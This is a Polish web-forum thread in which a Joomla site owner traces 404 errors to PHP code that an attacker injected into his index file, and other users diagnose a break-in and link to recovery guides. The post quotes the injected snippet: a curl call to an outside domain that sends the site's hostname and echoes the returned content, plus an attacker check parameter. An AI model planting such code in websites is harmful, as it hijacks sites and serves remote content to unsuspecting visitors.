PDA

Zobacz pełną wersję : 404 - problem



bulin
11-05-2014, 14:14
Witam,

Mam następujący problem:
Na mojej stronie (www.scenariuszfilmowy.pl) zaczął się pojawiać 404 Not Found Problem. To o tyle dziwne że do tej pory wszystko było ok, nic nie zmieniałem w css czy ustawianiach; hosting też twierdzi że nie nie 'poprawiał' u siebie.
Niestety nie wiem skąd się bierze ten błąd i jak go poprawić.

Będę wdzięczny za wszelkie wskazówki.

Z góry dzięki:)

Gall Anonim
11-05-2014, 16:47
Może włączyłeś proste adresy a nie poprawiłeś pliku htaccess.txt na .htaccess (jest w głównym katalogu Joomla)

bulin
14-05-2014, 12:31
Dziwna ale i zastanawiająca sprawa. Okazało się że do mojego indexu został w jakiś sposób odany następujący kod:

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.aycakozmetik.org/client.php?x=".$_SERVER["HTTP_HOST"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$x = curl_exec($ch);
curl_close($ch);
echo $x;
if($_GET["yenirakix"]) die('yenirakikontrol');
?>

Bez mojej wiedzy wczytywał (a raczej próbował wczytać) reklamę, która odpowiadała za błąd 404.
Czy ktoś wie co to jest i skąd się wzięło? To jakiś lipny moduł, wirus? Jak przeskanować ftp od wirusów?
Na razie ręcznie usunąłem ten kod i zmieniłem hasło do panelu joomli.

komodore
14-05-2014, 16:50
Chociaż strona wygląda dobrze, to zalecam lekturę:
http://wiki.joomla.pl/Witryna_po_włamaniu
http://www.joomla.pl/o-joomla/joomla-w-praktyce/mam-witryne-w-joomla/postepowanie-po-wlamaniu

Nic nie ma prawa się samo dopisywać, chyba, że masz hosting, który ma to w umowie.
Czy masz aktualny joomla?

Karol99
14-05-2014, 19:55
Ewidentne włamanie.

Z opisów w internecie wynika, że raczej na skutek kradzieży lub podsłuchania hasła do FTP, niż przez dziurę w J! lub rozszerzeniach - ale żeby mieć pewność musisz przeanalizować logi.

Dalsze postępowanie wg. wskazanych wyżej instrukcji.